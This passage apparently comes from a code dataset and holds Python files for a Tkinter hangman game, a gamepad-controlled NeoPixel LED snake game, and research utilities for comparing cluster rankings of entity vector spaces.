self.timer = Label(\n self.row_0_column_2,\n text=self.timer_text.get(),\n bg=b, fg=f,\n font=st.font(self.rem, 14)\n )\n self.timer.grid(row=1, column=0, rowspan=2, sticky='nsew')\n\n # noinspection PyUnusedLocal\n def build_word_label(self, *args):\n \"\"\"Secret word label\"\"\"\n bg, fg = st.set_buttons_color('word', 1)\n # noinspection PyAttributeOutsideInit\n self.secret_word_label = Label(\n self.row_2_grid, textvariable=self.word_text,\n bg=bg, fg=fg, justify=RIGHT,\n font=st.font(self.rem, 16), anchor='e'\n )\n self.secret_word_label.grid(row=0, column=1,\n sticky='nse',\n padx=20, pady=5)\n\n # noinspection PyUnusedLocal\n def alert(self, *args):\n \"\"\"Timer alert for the hard level\"\"\"\n if not self.time_left.get():\n self.mini_screen()\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.start_stop_action('stop')\n self.banner_text.set('Random')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.timer_text.set(strftime(\"%H:%M\"))\n\n def draw_word(self):\n \"\"\"Drawing loop for the secret word label\"\"\"\n output = []\n index = 1\n\n # Draws the displayed word after each letter choice\n for x in self.secret_word.get():\n if self.level_status == 1:\n if x in self.first_last \\\n or x in self.guesses \\\n or x in [' ', '-']:\n output.append(x)\n elif x == self.char:\n output.append(self.char)\n else:\n output.append('_')\n index += 1\n elif self.level_status >= 2:\n if x in self.guesses or x in [' ', '-']:\n output.append(x)\n elif x == 
self.char:\n output.append(self.char)\n else:\n output.append('_')\n\n # Finally sets the label for display\n self.word_text.set(' '.join(output))\n\n def scoring(self):\n \"\"\"Scoring method for each level\"\"\"\n new = self.char\n total = 'Total'\n xp = 7 - len(self.misses)\n n = 0\n t = 0\n\n # Scoring points are defined by the input letter\n # if vowels score are lower in each difficulty level\n # if console, score are higher in each difficulty level\n if self.char in self.secret_word.get() and self.char in 'AEIOU':\n if self.level_status == 1:\n n = 4 * xp\n if self.level_status == 2:\n n = 5 * xp\n if self.level_status == 3:\n n = 7 * xp\n elif self.char in self.secret_word.get() and self.char not in 'AEIOU':\n if self.level_status == 1:\n n = 5 * xp\n if self.level_status == 2:\n n = 6 * xp\n if self.level_status == 3:\n n = 8 * xp\n self.total += n\n\n # Finally sets up the scoring window\n self.score_text.set(\n f'{new}' + (len(total) + 4 + len(str(t)) - 1) * ' ' + f'{n}\\n'\n f'{total}' + 6 * ' ' + f'{self.total}'\n )\n\n def game_status(self):\n \"\"\"Checks if it's a win or a loss\n Also changes the countdown label foreground color\n depending to the misses\"\"\"\n if len(self.misses) == 7:\n self.mini_screen()\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.start_stop_action('stop')\n self.banner_text.set('Random')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.timer_text.set(strftime(\"%H:%M\"))\n\n if sorted(self.guesses) == sorted(self.sorted):\n # Add a score entry to database if entries are less than 13\n if len(rc.search()) < 13:\n rc.add_entry(self.level_status, self.total)\n\n # Checks if last score in database is less than new score\n # if is than delete the last entry and the new higher score\n elif len(rc.search()) == 13 \\\n and rc.search()[12].points < self.total:\n rc.delete()\n rc.add_entry(self.level_status, self.total)\n\n self.mini_screen()\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.start_stop_action('stop')\n self.banner_text.set('Random')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.s_w_list.append(self.secret_word.get())\n self.timer_text.set(strftime(\"%H:%M\"))\n\n def abc_buttons(self):\n \"\"\"Creates the alphabet buttons\"\"\"\n # noinspection PyAttributeOutsideInit\n r, c = 0, 0\n for item in st.ALPHABET:\n b = Button(\n self.row_1_grid, text='%s' % item,\n bg=st.color['bg'], fg=st.color['fg_abc'],\n font=st.font(self.rem, 1),\n command=lambda i=item: self.set_abc(i),\n justify='center', overrelief=SUNKEN,\n anchor=CENTER, bd=0, state=DISABLED,\n disabledforeground=st.color['dfg_abc'],\n activeforeground=st.color['afg_abc'],\n activebackground=st.color['abg_abc'],\n )\n if c == 13:\n r += 1\n c = 0\n b.grid(row=r, column=c, sticky='news', padx=7, pady=6)\n self.abc.append(b)\n c += 1\n\n def category_buttons(self):\n \"\"\"Word category buttons\"\"\"\n r, c, bg, s = 0, 0, st.color['bg_cat_a'], NORMAL\n for item in st.EN:\n if item == 'random':\n bg = st.color['fg']\n s = DISABLED\n b = Button(\n self.row_3_grid, text='%s' % item.capitalize(),\n bg=bg, fg=st.color['fg_cat'],\n font=st.font(self.rem, 8),\n command=lambda i=item: self.set_category(i),\n overrelief=SUNKEN,\n anchor=CENTER, bd=0, state=s,\n disabledforeground=st.color['bg'],\n activeforeground=st.color['fg_cat'],\n activebackground=st.color['bg_cat_a'],\n width=1\n )\n if c == 4:\n r += 1\n c = 0\n b.grid(row=r, column=c, sticky='news', padx=15, pady=10)\n 
self.category.append(b)\n c += 1\n\n def buttons(self):\n \"\"\"Info, check buttons\"\"\"\n close = st.image('quit')\n info = st.image('info')\n rule = st.image('rule')\n # noinspection PyAttributeOutsideInit\n self.start = self.create_button(self.row_0_grid, 'start')\n self.start.config(width=2, font=st.font(self.rem, -2))\n self.start.grid(row=0, column=0,\n sticky='news', padx=20, pady=7)\n # noinspection PyAttributeOutsideInit\n self.stop = self.create_button(self.row_0_grid, 'stop')\n self.stop.config(state=DISABLED, width=2, font=st.font(self.rem, -2))\n self.stop.grid(row=1, column=0,\n sticky='news', padx=20, pady=7)\n # noinspection PyAttributeOutsideInit\n self.quit = self.create_button(self.master, 'exit')\n self.quit.config(font=st.font(self.rem, 1),\n image=close)\n self.quit.image = close\n self.quit.place(relx=0.99, rely=0.01, anchor='ne')\n # noinspection PyAttributeOutsideInit\n self.score = self.create_button(self.row_0_column_1, 'high score')\n self.score.config(font=st.font(self.rem, -2, style='normal'),\n overrelief=None, relief=SOLID, bd=0,\n command=lambda: self.score_screen())\n self.score.grid(row=5, column=0, sticky='news')\n # noinspection PyAttributeOutsideInit\n self.info = self.create_button(self.welcome, 'info')\n self.info.config(font=st.font(self.rem, 0),\n command=lambda: st.set_rules('Game Info',\n st.prompt['Game Info']),\n image=info)\n self.info.image = info\n self.info.place(relx=0.01, rely=0.01, anchor='nw')\n # noinspection PyAttributeOutsideInit\n self.rule = self.create_button(self.welcome, 'rules')\n self.rule.config(font=st.font(self.rem, 0),\n command=lambda: st.set_rules('Game Rules',\n st.prompt['Game Rules']),\n image=rule)\n self.rule.image = rule\n self.rule.place(relx=0.01, rely=0.1, anchor='nw')\n # noinspection PyAttributeOutsideInit\n self.go = self.create_button(self.welcome, 'ENTER')\n self.go.config(font=st.font(self.rem, 16, family='Verdana'),\n text='ENTER')\n self.go.pack(side=BOTTOM, expand=False,\n padx=5, pady=60)\n back = st.image('back')\n # noinspection PyAttributeOutsideInit\n self.back = self.create_button(self.row_0_grid, 'Back')\n self.back.config(font=st.font(self.rem, 1),\n image=back)\n self.back.image = back\n self.back.place(relx=0.99, rely=0.42, x=0, y=0, anchor='se')\n r, s, bg = 0, NORMAL, st.color['bg_level']\n for item in st.L_EN:\n b = self.create_button(self.row_0_column_3, item)\n if item == 'easy':\n s = DISABLED\n bg = st.color['fg']\n b.config(state=s, font=st.font(self.rem, -4, style='bold'),\n command=lambda i=item: self.set_level(i), bg=bg)\n b.grid(row=r, column=0, sticky='news', pady=3)\n self.level.append(b)\n r += 1\n\n def destroy_all(self):\n \"\"\"Close all windows\"\"\"\n st.set_rules('Bye', st.prompt['Bye'])\n sleep(0.6)\n # noinspection PyBroadException\n try:\n self.master.destroy()\n # self.master_2.destroy()\n except NotImplementedError:\n pass\n\n def set_abc(self, item):\n \"\"\"Sets the alphabet buttons to the desired state\n depending to guesses and misses.\n calls the draw_word and game_status methods\n \"\"\"\n self.char = item\n self.scoring()\n bg, dfg, s = st.color['bg'], st.color['dfg_abc_b'], DISABLED\n if item in self.secret_word.get():\n bg, dfg, s = st.color['bg'], st.color['dfg_abc_g'], \\\n DISABLED\n self.guesses.append(item)\n else:\n self.misses.append(item)\n index = 0\n for x in st.ALPHABET:\n self.a.update({x: index})\n index += 1\n self.abc[self.a[item]].config(state=s, bg=bg, disabledforeground=dfg)\n c = 7 - len(self.misses)\n if c == 0:\n c = 7\n 
self.counter.set(f'{c}')\n self.count.config(fg=st.color[f'{c}'])\n self.draw_word()\n self.game_status()\n\n def set_welcome(self):\n self.welcome.pack_forget()\n sleep(0.6)\n\n self.mainframe.pack(fill=BOTH, expand=True)\n\n def set_back(self):\n self.mainframe.pack_forget()\n sleep(0.4)\n self.welcome.pack(fill=BOTH, expand=True)\n # noinspection PyBroadException\n # try:\n # self.master_2.destroy()\n # except NotImplementedError:\n # pass\n self.level[0].config(state=NORMAL)\n self.level[1].config(state=NORMAL)\n self.level[2].config(state=DISABLED)\n self.first_last.clear()\n\n def set_secret_word(self):\n \"\"\"Sets the secret word by the user choice\"\"\"\n self.guesses.clear()\n self.misses.clear()\n self.char = ''\n search = self.prompt.get()\n lang = st.C_EN\n\n if search.lower() == 'random':\n from random import choice\n search_query = choice(lang)\n else:\n search_query = search.lower()\n\n # Opens available words from csv file\n try:\n word = st.open_csv(search_query, self.level_status).upper()\n if word in self.s_w_list:\n word = st.open_csv(search_query, self.level_status).upper()\n self.secret_word.set(word)\n for x in word:\n if x == word[0] or x == word[len(word) - 1]:\n if x.upper() in self.first_last:\n continue\n self.first_last.append(x.upper())\n if self.level_status == 1:\n self.sorted = st.sort(word)\n else:\n self.sorted = st.sort(word, True)\n self.draw_word()\n self.banner_text.set(search_query.capitalize())\n except NotImplementedError:\n pass\n\n def set_command(self, text):\n \"\"\"Sets command for buttons\"\"\"\n command = None\n if text == 'start':\n command = self.set_start_button\n elif text == 'stop':\n command = self.set_stop_button\n elif text == 'exit':\n command = self.destroy_all\n elif text == 'ENTER':\n command = self.set_welcome\n # elif text == 'english':\n # command = self.set_language\n elif text == 'Back':\n command = self.set_back\n return command\n\n # def set_language(self):\n # \"\"\"Method for change the categories between english and french\"\"\"\n # if self.choose.cget('text').lower() == 'english':\n # self.choose.config(text='Francais')\n # self.lang = 'ENG'\n # elif self.choose.cget('text').lower() == 'francais':\n # self.choose.config(text='English')\n # self.lang = 'FRA'\n\n def start_stop_action(self, text):\n \"\"\"Start and stop buttons common actions\"\"\"\n bc, ba, bb, dfg, s, s_2, s_3 = None, None, None, None, None, None, None\n sbg, stbg = None, None\n if text == 'start':\n if self.level_status == 3:\n self.clock_text.set('Timer')\n for x in range(3):\n if self.level[x].cget('state') == 'disabled':\n continue\n else:\n self.level[x].grid_forget()\n bc = st.color['fg']\n ba = st.color['fg']\n bb = st.color['bg_abc_a']\n dfg = st.color['bg']\n s = DISABLED\n s_2 = NORMAL\n s_3 = NORMAL\n sbg = st.color['fg']\n stbg = st.color['bg_stop']\n if text == 'stop':\n self.first_last.clear()\n self.sorted = ''\n self.banner_text.set('')\n self.clock_text.set('Clock')\n self.running = False\n # self.choose.place(relx=0.67, rely=0.23, x=0, y=0, anchor='se')\n r = 0\n for x in range(3):\n self.level[x].grid(row=r, column=0, sticky='news', pady=3)\n r += 1\n bc = st.color['bg_cat_a']\n ba = st.color['fg']\n bb = st.color['bg']\n dfg = st.color['fg']\n s = NORMAL\n s_2 = DISABLED\n s_3 = DISABLED\n sbg = st.color['bg_start']\n stbg = st.color['fg']\n self.start.config(state=s, bg=sbg)\n self.stop.config(state=s_2, bg=stbg)\n self.total = 0\n self.score_text.set('0\\n0')\n for a in range(8):\n if self.category[a].cget('text').lower() == 
self.prompt.get():\n self.category[a].config(state=DISABLED, bg=ba)\n else:\n self.category[a].config(state=s, bg=bc)\n for i in range(0, 26):\n if self.level_status == 1:\n if self.abc[i].cget('text') in self.first_last:\n self.abc[i].config(bg=st.color['bg'], state=DISABLED,\n disabledforeground=st.color['dfg_abc_g'])\n else:\n self.abc[i].config(bg=bb, disabledforeground=dfg, state=s_3)\n else:\n self.abc[i].config(bg=bb, disabledforeground=dfg, state=s_3)\n\n def set_start_button(self):\n \"\"\"Sets start button action\"\"\"\n print(\"This is working\")\n self.time_left.set(st.DEFAULT_GAP)\n self.running = True\n self.counter.set('7')\n self.set_secret_word()\n self.quit.config(state=DISABLED)\n self.back.config(state=DISABLED)\n self.start_stop_action('start')\n # self.choose.place_forget()\n # noinspection PyBroadException\n # try:\n # if self.master_2:\n # self.master_2.destroy()\n # except NotImplementedError:\n # pass\n\n def set_stop_button(self):\n \"\"\"Sets stop button action\"\"\"\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.start_stop_action('stop')\n self.timer_text.set(strftime(\"%H:%M\"))\n\n def set_category(self, text):\n \"\"\"Category buttons function\"\"\"\n self.prompt.set(text)\n for a in range(8):\n if self.category[a].cget('text').lower() == text:\n self.category[a].config(state=DISABLED, bg=st.color['fg'])\n else:\n self.category[a].config(state=NORMAL, bg=st.color['bg_cat_a'])\n\n def set_level(self, text):\n \"\"\"Method for difficulty level\"\"\"\n if text == 'hard':\n self.level_status = 3\n if text == 'medium':\n self.level_status = 2\n if text == 'easy':\n self.level_status = 1\n for x in range(3):\n if self.level[x].cget('text').lower() == text:\n self.level[x].config(state=DISABLED, bg=st.color['fg'])\n else:\n self.level[x].config(state=NORMAL, bg=st.color['bg_level'])\n\n def update(self):\n \"\"\"Master window refresh rate, 1 second\"\"\"\n time_left = self.time_left.get()\n if self.running and time_left and self.level_status == 3:\n minutes, seconds = st.minutes_seconds(time_left)\n self.timer_text.set(\n '{:0>2}:{:0>2}'.format(minutes, seconds)\n )\n self.time_left.set(time_left - 1)\n self.master.after(1000, self.update)\n\n\nif __name__ == '__main__':\n root = Tk(className='Guess Letter v2.0')\n Hangman(root)\n root.mainloop()\n","sub_path":"guess_letter.py","file_name":"guess_letter.py","file_ext":"py","file_size_in_byte":34845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"345072019","text":"#!/usr/bin/env python3\nimport time\nfrom neopixel import *\nimport argparse\nfrom random import randint\nimport threading\nfrom inputs import devices\nfrom inputs import get_gamepad\nfrom random import randint\nfrom matrix_board import Matrix_board\nfrom snake import Snake\nfrom apple import Apple\nfrom powerup import Powerup\n \n# LED strip configuration:\nLED_COUNT = 256 # Number of LED pixels.\nLED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\n#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 100 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\ndef 
powerupSpawner():\n while snake.alive:\n time.sleep(randint(20, 35))\n powerup.spawnPowerup(strip,Color,randint(0, 255),randint(1, 2))\n time.sleep(7)\n powerup.powerup = 0\n strip.setPixelColor(powerup.position, Color(0,0,0))\n strip.show()\n\ndef gamepadEventListener():\n while snake.alive:\n print(\"Listening for events\")\n events = get_gamepad()\n if events[0].code == \"BTN_SOUTH\":\n snake.moveRight()\n\n if events[0].code == \"BTN_WEST\":\n snake.moveUp()\n\n if events[0].code == \"BTN_NORTH\":\n snake.moveLeft()\n\n if events[0].code == \"BTN_EAST\":\n snake.moveDown()\n\ndef snakeMovement():\n while snake.alive:\n if snake.row > -1 and snake.row < 17 and snake.col > -1 and snake.col < 17:\n if apple.isAppleEaten(snake.body):\n print(\"Apple eaten\")\n apple.spawnApple(strip,Color,randint(0, 255))\n snake.increaseSpeed()\n snake.increaseScore()\n snake.movementSnake(strip,Color,board,time,True,0)\n elif powerup.isPowerupEaten(snake.body):\n print(\"Powerup eaten\")\n snake.movementSnake(strip,Color,board,time,False,powerup.powerup)\n powerup.powerup = 0\n else:\n print(\"Moving\")\n snake.movementSnake(strip,Color,board,time,False,0)\n else:\n print(\"Snake dead\")\n snake.alive = False\n board.clearBoard(strip, Color, time)\n board.gameOver(strip, Color, time, snake.score)\n\n print(\"Snake dead\")\n board.clearBoard(strip, Color, time)\n board.gameOver(strip, Color, time, snake.score)\n \n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')\n args = parser.parse_args()\n \n strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\n strip.begin()\n\n board = Matrix_board(16,16)\n board.createBoard()\n\n snake = Snake(True,3,4,8,0)\n snake.spawnSnake(strip,Color,board)\n\n apple = Apple()\n apple.spawnApple(strip,Color,randint(0, 255))\n\n powerup = Powerup()\n\n\n print(\"*** AVAILABLE DEVICES ***\")\n for device in devices:\n print(device)\n print(\"*************************\")\n\n print ('Press Ctrl-C to quit.')\n if not args.clear:\n print('Use \"-c\" argument to clear LEDs on exit')\n \n try:\n t1 = threading.Thread(target=gamepadEventListener)\n t1.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=snakeMovement)\n t2.start()\n\n t3 = threading.Thread(target=powerupSpawner)\n t3.daemon = True\n t3.start()\n\n\n except KeyboardInterrupt:\n if args.clear:\n board.clearBoard(strip, Color, time)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"582974579","text":"import numpy as np\nimport scipy.spatial.distance\nfrom sklearn.neighbors import KDTree\n\nfrom util import io\n\n\ndef kdTree(entity_names, space):\n inds_to_check = range(0,400,20)\n\n for i in inds_to_check:\n print(entity_names[i])\n tree = KDTree(space, leaf_size=2)\n dist, ind = tree.query([space[i]], k=5)\n ind = ind[0][:]\n for j in ind:\n print(entity_names[j])\n\ndef biggestEucDifference(space1, space2, entity_names):\n dists = []\n for i in range(len(space1)):\n for j in range(len(space2)):\n dists.append(scipy.spatial.distance.euclidean(space1[i], space2[j]))\n dists = np.flipud(np.sort(dists))\n print(\"Biggest diff entities\")\n for i in range(len(dists)):\n print(dists[i], entity_names[i])\n if i == 500:\n break\n\"\"\"\nspace = io.import2dArray(\"../data/movies/nnet/spaces/films200.npy\")\nft_space = 
io.import2dArray(\"../data/movies/nnet/spaces/mds-nodupeCV1S0 SFT0 allL010010 LR kappa KMeans CA400 MC1 MS0.4 ATS1000 DS800FT BOCFi NT[200]tanh300V1.2L0.npy\")\nentity_names = io.import1dArray(\"../data/movies/nnet/spaces/entitynames.txt\")\nbiggestEucDifference(space, ft_space, entity_names)\n\"\"\"\n# Top_x is the amount of top entities to show. If 0, shows all\n# Cluster_ids are the clusters you want to show the top entities for. If none, then it shows all\ndef getTopEntitiesOnRanking(ranking, entity_names, cluster_names, cluster_length=3, top_x=-1, cluster_ids=None, output=True):\n if cluster_ids is not None:\n ranking = ranking[cluster_ids]\n cluster_names = cluster_names[cluster_ids]\n for i in range(len(cluster_names)):\n cluster_names[i] = cluster_names[i]\n top_entities = []\n top_rankings = []\n for c in range(len(ranking)):\n top_cluster_entities = []\n top_cluster_rankings = []\n sorted_cluster = np.asarray(list(reversed(entity_names[np.argsort(ranking[c])])))\n sorted_rankings = np.asarray(list(reversed(ranking[c][np.argsort(ranking[c])])))\n for e in range(len(sorted_cluster)):\n top_cluster_entities.append(sorted_cluster[e])\n top_cluster_rankings.append(sorted_rankings[e])\n if e == top_x:\n break\n top_entities.append(top_cluster_entities)\n top_rankings.append(top_cluster_rankings)\n if output:\n print(\"Cluster:\", cluster_names[c], \"Entites\", top_cluster_entities)\n #print(\"Cluster:\", cluster_names[c], \"Entites\", top_cluster_rankings)\n return top_entities, top_rankings\n\n\ndata_type = \"movies\"\nfile_name = \"num_stw_num_stw_200_MDS_ndcg_1000_10000_0_rank_50_100_0.0_k-means++_200_kmeans\"\ncluster_names = io.import1dArray(\"../../data_paper/experimental results/chapter 5/\" + data_type + \"/cluster/\" + file_name + \".txt\", \"s\")\nranking = io.import2dArray(\"../../data_paper/experimental results/chapter 5/\" + data_type + \"/cluster/\" + file_name + \"_best_200_rank.npy\", \"s\")\nentity_names = io.import1dArray(\"../../data_paper/experimental results/chapter 5/\" + data_type + \"/entity_names.txt\")\ntop_x = 5\ncluster_length = 3\ncluster_ids = None\n\nnormal_top_entities = getTopEntitiesOnRanking(ranking, entity_names, cluster_names, cluster_length, top_x, cluster_ids)\n\"\"\"\nprint(\"---------------------\")\nfile_name = \"mds-nodupeCV1S0 SFT0 allL010010 LR kappa KMeans CA400 MC1 MS0.4 ATS1000 DS800FT BOCFi NT[200]tanh300V1.2\"\nranking = io.io.import2dArray(\"../data/\" + data_type + \"/nnet/clusters/\" + file_name + \".txt\")\nfinetuned_top_entities = getTopEntitiesOnRanking(ranking, entity_names, cluster_names, cluster_length, top_x, cluster_ids)\n\"\"\"\n\ndef id_from_array(array, name):\n for n in range(len(array)):\n if array[n] == name:\n return n\n print(\"FAILED TO FIND\", name)\n return None\n\n# Must be the full top entities, with numerical values\ndef compareTopEntitiesOnRanking(ranking_1, ranking_2, cluster_names, cluster_length, top_x, output=True, reverse=False,\n from_top=-1):\n\n if from_top == -1:\n from_top = len(ranking_1[0])\n\n\n pos = np.zeros( shape=(len(ranking_1), len(ranking_1[0])))\n for r in range(len(ranking_1)):\n for v in range(len(ranking_1[r])):\n pos[r][v] = v\n\n #Convert the rankings to sorted lists and create empty 1-15,000 array\n sorted_ranking_names1 = np.empty(dtype=\"object\",shape = (len(ranking_1), from_top))\n sorted_ranking1 = np.empty(shape = (len(ranking_1), from_top))\n sorted_ranking1_by2 = np.empty(shape = (len(ranking_1), from_top))\n sorted_pos = np.zeros( shape = (len(ranking_1), from_top))\n\n for c 
in range(len(ranking_1)):\n sorted_ranking_names1[c] = list(reversed(entity_names[np.argsort(ranking_1[c])]))[:from_top]\n sorted_ranking1[c] = list(reversed(ranking_1[c][np.argsort(ranking_1[c])]))[:from_top]\n sorted_ranking1_by2[c] = list(reversed(ranking_1[c][np.argsort(ranking_2[c])]))[:from_top]\n sorted_pos[c] = list(reversed(pos[c][np.argsort(ranking_1[c])]))[:from_top]\n\n sorted_ranking_names2 = np.empty(dtype=\"object\", shape = (len(ranking_1), from_top))\n sorted_ranking2 = np.zeros(shape = (len(ranking_1), from_top))\n sorted_ranking2_by1 = np.empty(shape = (len(ranking_1), from_top))\n sorted_pos2 = np.zeros( shape = (len(ranking_1), from_top))\n\n for c in range(len(ranking_2)):\n sorted_ranking_names2[c] = list(reversed(entity_names[np.argsort(ranking_2[c])]))[:from_top]\n sorted_ranking2[c] = list(reversed(ranking_2[c][np.argsort(ranking_2[c])]))[:from_top]\n sorted_ranking2_by1[c] = list(reversed(ranking_2[c][np.argsort(ranking_1[c])]))[:from_top]\n sorted_pos2[c] = list(reversed(pos[c][np.argsort(ranking_2[c])]))[:from_top]\n\n\n all_diffs = np.zeros(shape = (len(sorted_ranking1), len(sorted_ranking2[0])))\n\n # Get the diffs between the sorted lists\n for c in range(len(sorted_ranking1)):\n for v in range(len(sorted_ranking1[c])):\n if reverse:\n all_diffs[c][v] = sorted_ranking2[c][v] - sorted_ranking1_by2[c][v]\n else:\n all_diffs[c][v] = sorted_ranking1[c][v] - sorted_ranking2_by1[c][v]\n\n # Sort and include sorted pos\n sorted_diffs = np.zeros(shape = (len(all_diffs), len(all_diffs[0])))\n sorted_names = np.empty(dtype=\"object\", shape = (len(all_diffs), len(all_diffs[0])))\n sorted_diff_pos =np.zeros(shape = (len(all_diffs), len(all_diffs[0])))\n sorted_diff_pos2 = np.zeros(shape = (len(all_diffs), len(all_diffs[0])))\n sorted_names2 = np.empty(dtype=\"object\", shape = (len(all_diffs), len(all_diffs[0])))\n\n\n for d in range(len(all_diffs)):\n sorted_diffs[d] = list(reversed(all_diffs[d][np.argsort(all_diffs[d])]))\n if reverse:\n sorted_names2[d] = list(reversed(sorted_ranking_names2[d][np.argsort(all_diffs[d])]))\n sorted_diff_pos2[d] = list(reversed(sorted_pos2[d][np.argsort(all_diffs[d])]))\n else:\n sorted_names[d] = list(reversed(sorted_ranking_names1[d][np.argsort(all_diffs[d])]))\n sorted_diff_pos[d] = list(reversed(sorted_pos[d][np.argsort(all_diffs[d])]))\n\n\n\n\n if output:\n for s in range(len(sorted_diffs)):\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff scores\", sorted_diffs[s][:top_x])\n if reverse:\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff entities\", sorted_names2[s][:top_x])\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff scores\", sorted_pos2[s][:top_x])\n else:\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff entities\", sorted_names[s][:top_x])\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff scores\", sorted_pos[s][:top_x])\n\n\n return all_diffs, sorted_diffs\n\n\ndef compareEntityOnCluster(ranking1, ranking2, clusters, entity_names, entity_name=\"\", entity_id=-1, cluster_name=\"\", cluster_id=-1):\n for c in range(len(clusters)):\n if cluster_name in clusters[c]:\n cluster_id = c\n break\n to_compare1 = None\n to_compare2 = None\n if cluster_id != -1:\n to_compare1 = ranking1[cluster_id]\n to_compare2 = ranking2[cluster_id]\n else:\n print(\"NO CLUSTER ID\")\n entity_id = id_from_array(entity_names, entity_name)\n if entity_id is not None and entity_id != -1:\n print(\"ranking1\", entity_name, to_compare1[entity_id])\n 
print(\"ranking2\", entity_name, to_compare2[entity_id])\n print(\"difference\", entity_name, to_compare1[entity_id] - to_compare2[entity_id])\n else:\n print(\"NO ENTITY ID\")\n\n\ndef getSimilarClusters(cluster_dict_1, cluster_dict_2, trim_amt, file_name, data_type, threshold_for_stopping, threshold_for_stopping_1):\n matching_clusters = np.zeros(len(cluster_dict_1), dtype=np.int32)\n new_cluster_dict_2 = []\n for c in cluster_dict_2:\n new_cluster_dict_2.append(np.flipud(c))\n cluster_dict_2 = None\n cluster_dict_2 = new_cluster_dict_2\n positions = np.zeros(len(cluster_dict_1))\n for c in range(len(cluster_dict_1)):\n print(c)\n lowest_pos = 242343\n lowest_cluster = len(cluster_dict_2)-1\n for n in range(len(cluster_dict_1[c])):\n if n > threshold_for_stopping_1:\n break\n name_to_match = cluster_dict_1[c][n]\n if \":\" in name_to_match:\n name_to_match = name_to_match[:-1]\n for c2 in range(len(cluster_dict_2)):\n for n2 in range(len(cluster_dict_2[c2])):\n if n2 > threshold_for_stopping:\n break\n name_to_match2 = cluster_dict_2[c2][n2]\n if \":\" in name_to_match2:\n name_to_match2 = name_to_match2[:-1]\n if name_to_match == name_to_match2:\n if n2 < lowest_pos:\n lowest_cluster = c2\n lowest_pos = n2\n break\n matching_clusters[c] = lowest_cluster\n positions[c] = lowest_pos\n sorted_matching_indexes = matching_clusters[np.argsort(positions)]\n sorted_orig_indexes = np.asarray(list(range(len(cluster_dict_1))))[np.argsort(positions)]\n print(\"_--------------------------------------------------\")\n print(\"SORTED\")\n print(\"_--------------------------------------------------\")\n lines = []\n for c in range(len(sorted_orig_indexes)):\n line_p1 = \"\"\n for n in cluster_dict_1[sorted_orig_indexes[c]][:trim_amt]:\n line_p1 = line_p1 + n + \" \"\n line_pl2 = \"\"\n for k in cluster_dict_2[sorted_matching_indexes[c]][:trim_amt]:\n line_pl2 = line_pl2 + k + \" \"\n line = line_p1 + \" |||| \" + line_pl2\n lines.append(line)\n print(line)\n io.io.write1dArray(lines, \"../data/\" + data_type + \"/investigate/\" + file_name + str(trim_amt) + \".txt\")\n\"\"\"\ndata_type = \"movies\"\nfile_name = \"mds-nodupeCV1S0 SFT0 allL010010 LR acc KMeans CA400 MC1 MS0.4 ATS500 DS800\"\ncluster_names = np.asarray(dt.import2dArray(\"../data/\" + data_type + \"/cluster/dict/\" + file_name + \".txt\",\"s\"))\nsecond_cluster_name = \"mds-nodupeCV1S0 SFT0 allL010010 LR kappa KMeans CA400 MC1 MS0.4 ATS1000 DS800\"\nsecond_cluster_names = np.asarray(dt.import2dArray(\"../data/\" + data_type + \"/cluster/dict/\" + second_cluster_name + \".txt\",\"s\"))\ntopic_model_names = np.asarray(dt.import2dArray(\"../data/\" + data_type + \"/LDA/names/\" + \"class-all-100-10-all-nodupe.npzDTP0.001TWP0.1NT100.txt\", \"s\"))\n\ntrim_amt = 10\nthreshold_for_stopping = 100\nthreshold_for_stopping_1 = 20\ngetSimilarClusters( topic_model_names, cluster_names, trim_amt, file_name, data_type, threshold_for_stopping, threshold_for_stopping_1)\n\"\"\"\n\"\"\"\nranking1 = dt.import2dArray(\"../data/\" + data_type + \"/rank/numeric/\" + file_name + \".txt\")\nentity_names = dt.import1dArray(\"../data/\" + data_type + \"/nnet/spaces/entitynames.txt\")\ntop_x = 5\ncluster_length = 3\ncluster_ids = None\n#Reverse = False: How far certain moves in A have fallen after being in B\n#Reverse = True: How high certain movies have grown in A after being in B\nreverse = False\nfrom_top = 100\n\nfile_name = \"places NONNETCV5S0 SFT0 allL050kappa KMeans CA200 MC1 MS0.4 ATS2000 DS400 foursquareFT BOCFi NTtanh1 NT1300linear\"\nranking2 = 
